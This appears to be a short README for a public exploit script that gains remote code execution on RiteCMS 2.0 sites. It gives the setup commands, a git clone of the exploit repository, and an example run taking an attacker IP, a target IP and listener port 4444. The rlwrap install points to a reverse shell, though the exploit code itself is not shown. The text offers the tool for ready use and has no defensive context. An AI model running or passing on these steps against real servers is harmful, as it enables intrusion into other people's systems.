A Remote Code Execution python script to exploit RiteCMS 2.0
python3 ritecms2.0-exploit.py -i <IP> -t <target-IP> -p <port>
pip3 install requests
pip3 install argparse
pip3 install subprocess
sudo apt install rlwrap
git clone https://github.com/pjobsina/RiteCMS-2.0-Exploit-RCE.git && cd RiteCMS-2.0-Exploit-RCE
python3 ritecms2.0-exploit.py -i 192.168.1.10 -t 192.168.1.20 -p 4444
If first run does not work, try to run again.
Enjoy!